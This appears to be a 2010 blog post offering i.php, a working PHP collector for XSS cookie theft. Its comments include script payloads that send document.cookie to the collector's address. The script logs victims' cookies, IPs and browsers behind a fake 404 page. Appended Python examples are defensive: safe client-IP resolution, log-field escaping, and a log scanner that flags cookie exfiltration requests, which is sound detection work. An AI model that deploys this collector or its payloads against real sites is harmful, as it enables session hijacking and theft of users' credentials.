i.php – For (some) XSS and cookie borrowing needs.

October 25th, 2010 by

i.php, when visited, collects useful information about the visitor.
It can be used to collect cookies or other information from the visiting user.

Get a copy here – i.php.txt

[START CODE ]

<?php
/*-------------------- i.php : XSS script coded by kno------------------------
This page, when visited, will collect useful information about the visitor.
It can be used to collect cookies or other information from the visiting user.
Be warned that no effort was (intentionally) made to clean/validate input.
Please be careful not to become a victim of XSS yourself when viewing the logs.
It is best to save the logs with a .txt extension.

Example XSS Scripts to Get Info (where http://192.168.56.101/ is this page):

#EXAMPLE 1
<script>new Image().src="http://192.168.56.101/i?c="+document.cookie; </script>

#EXAMPLE 2
<script>new Image().src="http://192.168.56.101/i?c="+document.cookie+"&e=XSS-ID123"; </script>

To create the log for the first time:
touch log.txt  #From path of i.php noted in settings
chmod 655 log.txt

To reset the log from a web browser:

http://192.168.56.101/?reset=su6ad4tH

To display the log from the browser:

http://192.168.56.101/?display=su6ad4tH

There is an extra variable 'e' that can receive extra info from the command line if need be.

Do not use this without proper permission from all users or the appropriate
authority. This is intended for pen testing, and as a XSS Proof Of Concept.
You are solely responsible for any use of this script/page.  If you couldn't
have coded this yourself, don't use it.
*/

#Settings
$log = 'logs/info.txt'; //It is a good idea to place this outside the webroot ('../wwwlog/log.txt')
$page_name = '/i.php'; //Used in 404 Page
$password = 'su6ad4tH'; //Used to clear the log and display output via web. (Null Password Disables This Feature)

#Request parameters (isset guards avoid PHP notices when a parameter is absent)
$cookie  = isset($_GET['c']) ? $_GET['c'] : '';              //Cookie
$extra   = isset($_GET['e']) ? $_GET['e'] : '';              //Extra info
$display = isset($_GET['display']) ? $_GET['display'] : '';  //Display request
$reset   = isset($_GET['reset']) ? $_GET['reset'] : '';      //Reset request

#Get Browser Type
$browser = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';

#Get Referring Page
$refer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

#Get IP (X-Forwarded-For is a client-supplied header and can be spoofed)
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
 $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
 $ip = $_SERVER['REMOTE_ADDR'];
}

#Get Hostname
$hostname = gethostbyaddr($ip);

#Create Timestamp
$timestamp = date("Y:m:d:H:i:s");

#Write Output (skipped when this request is the password-protected display request)
$file_handle = fopen($log, 'a');
if ($file_handle) {
 $output = "TIME: " . $timestamp . "\n";
 if ($ip)       { $output .= "IP: " . $ip . "\n"; }
 if ($hostname) { $output .= "HOST: " . $hostname . "\n"; }
 if ($browser)  { $output .= "BROWSER: " . $browser . "\n"; }
 if ($refer)    { $output .= "REFERER: " . $refer . "\n"; }
 if ($cookie)   { $output .= "COOKIE: " . $cookie . "\n"; }
 if ($extra)    { $output .= "EXTRA: " . $extra . "\n"; }
 $output .= "\n";

 if ($display == '' || $display != $password) {
  fwrite($file_handle, $output);
 }
 fclose($file_handle);
}
//If the page is set to Reset....
if ($reset != '' && $reset == $password) {
 $fp = fopen($log, 'w');  //Opening for write truncates the log
 if ($fp) {
  fclose($fp);
  echo "<html><head><title>Page Reset</title></head><body><h1>Page Reset</h1></body></html>";
 } else {
  echo "<html><head><title>Reset Failed</title></head><body><h2>Page Was Not Able To Be Reset</h2></body></html>";
 }
//If it is set to Display....
} elseif ($display != '' && $display == $password) {
 header('Content-type:text/plain');  //Plain text so logged markup is not rendered in the viewer's browser
 readfile($log);                     //Streams the log file; same result as system('cat ' . $log) without a shell
//Otherwise...
} else {
 echo "<html><head><title>404 Not Found</title></head>\n<body bgcolor=white>\n<h1>404 Not Found</h1>\nThe requested URL " . $page_name . " does not exist.\n</body></html>";
}
?>

[END CODE]
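Two details of the script are worth a defender's attention: it takes X-Forwarded-For at face value, and it writes the raw User-Agent, Referer and query values into a newline-delimited "KEY: value" log. Both are client-controlled, so any visitor can set the logged IP to an arbitrary string or forge extra records by embedding line breaks. The following is an added example, not code from the post or from kno, showing how a log writer would resolve the client address through a known proxy chain and neutralise control characters before logging. The trusted proxy range (10.0.0.0/8) and every address used are constructed for the example.

```python
"""Resolve a client address through X-Forwarded-For without trusting hops the
client itself may have supplied, and make client strings safe for a
line-oriented log. Constructed example; the proxy range is an assumption."""
import ipaddress
import re

# Assumed: load balancers / reverse proxies that sit in front of the web server.
TRUSTED_PROXIES = (ipaddress.ip_network("10.0.0.0/8"),)


def _parse_ip(text):
    """Return an ip_address object, or None when the text is not a valid address."""
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None


def _is_trusted(text, trusted):
    ip = _parse_ip(text)
    return ip is not None and any(ip in net for net in trusted)


def client_ip(remote_addr, xff, trusted=TRUSTED_PROXIES):
    """Walk the forwarding chain from the TCP peer leftwards.

    Each X-Forwarded-For entry was appended by the hop to its right, so an entry
    is only believable while that hop is a proxy we trust. The first untrusted
    hop is the client; anything further left was written by the client and is
    ignored. If the TCP peer is not a trusted proxy the header is ignored entirely.
    """
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    candidate = remote_addr
    while hops and _is_trusted(candidate, trusted):
        nxt = hops.pop()
        if _parse_ip(nxt) is None:
            break  # garbage in the header: keep the last hop we could verify
        candidate = nxt
    return candidate


CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")


def log_field(value, limit=1024):
    """Escape CR/LF and other control characters so a client-supplied value
    cannot start a new 'KEY: value' record, and cap the length."""
    value = (value or "")[:limit]
    return CONTROL_RE.sub(lambda m: "\\x%02x" % ord(m.group()), value)


if __name__ == "__main__":
    # Direct client claiming another address: the header is not believed.
    print(client_ip("203.0.113.7", "1.2.3.4"))
    # Client prepended a forged entry before the real chain behind a trusted proxy.
    print(client_ip("10.0.0.5", "1.2.3.4, 198.51.100.3"))
    # A User-Agent carrying a forged IP record is flattened onto one line.
    print("BROWSER: " + log_field("Mozilla/5.0\nIP: 1.2.3.4"))
```

The same idea applies to the script's COOKIE, REFERER and EXTRA fields: anything that ends up in the log should pass through log_field first, and the IP field should come from client_ip rather than from the header verbatim.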

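From the other side, the exfiltration request the comment block describes (`i?c=` followed by document.cookie) leaves a recognisable shape in any HTTP log that records full request URLs, such as the log of an egress proxy. The following added example (not part of the original post) parses combined-format lines whose request target is absolute, as a forward proxy records them, and flags query parameters whose value is a serialized cookie jar containing a session cookie name. The sample log lines, the collector address and the session cookie name list are all constructed for the example.

```python
"""Flag HTTP requests whose query string carries a serialized cookie jar, the
shape produced by new Image().src = ".../i?c=" + document.cookie.
Constructed example: log lines, hosts and cookie names are not real data."""
import re
from urllib.parse import urlsplit, unquote_plus

# Apache "combined" format. The request target is absolute (http://host/path)
# because a forward proxy logs the request line exactly as the browser sent it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Cookie names that identify a session; constructed list, extend for your stack.
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "sessionid", "sid", "session"}

# A value that looks like document.cookie: "name=value; name2=value2; ..."
COOKIE_JAR_RE = re.compile(r'^[\w.\-]+=[^;]*(?:;\s*[\w.\-]+=[^;]*)*$')

# Constructed sample lines: one exfiltration, one benign request, and one
# cookie-shaped value that carries no session identifier (should not fire).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Oct/2010:14:02:11 +0000] "GET http://192.168.56.101/i.php'
    '?c=PHPSESSID=9f3c2a1b;%20lang=en&e=XSS-ID123 HTTP/1.1" 404 208 '
    '"http://shop.example/product?id=7" "Mozilla/5.0"',
    '198.51.100.3 - - [25/Oct/2010:14:03:45 +0000] "GET http://shop.example/search'
    '?q=shoes HTTP/1.1" 200 5120 "http://shop.example/" "Mozilla/5.0"',
    '198.51.100.9 - - [25/Oct/2010:14:05:02 +0000] "GET http://192.168.56.101/i.php'
    '?c=theme=dark HTTP/1.1" 404 208 "-" "curl/7.21"',
]


def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def query_params(target):
    """Split the query on '&' only; splitting on ';' would shred a cookie jar."""
    params = []
    for part in urlsplit(target).query.split("&"):
        if part:
            name, _, value = part.partition("=")
            params.append((unquote_plus(name), unquote_plus(value)))
    return params


def suspicious_params(target):
    """Parameters whose value is a cookie jar that names a session cookie."""
    hits = []
    for name, value in query_params(target):
        if not COOKIE_JAR_RE.match(value):
            continue
        names = {pair.split("=", 1)[0].strip().lower() for pair in value.split(";")}
        if names & SESSION_COOKIE_NAMES:
            hits.append((name, value))
    return hits


def scan(lines):
    """One finding per line that looks like cookie exfiltration."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["target"])
        if not hits:
            continue
        dest_host = urlsplit(rec["target"]).hostname
        ref_host = urlsplit(rec["referer"]).hostname if rec["referer"] != "-" else None
        findings.append({
            "ip": rec["ip"],
            "time": rec["time"],
            "dest_host": dest_host,
            "params": hits,
            # The page that ran the script (Referer) is not the host receiving the
            # cookies: the tell-tale of script injected into another site's page.
            "cross_site": ref_host is not None and ref_host != dest_host,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The session-name check is what keeps the rule quiet: a bare `name=value` in a query string is common, but a jar that names the application's session cookie and is sent to a host other than the page's own is rarely legitimate. A cookie flagged HttpOnly never reaches document.cookie in the first place, which is the mitigation this whole technique depends on being absent.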

Note: @superevr mentioned using header('Content-type:text/plain'); I like that more, so I updated the code. #10/29/10
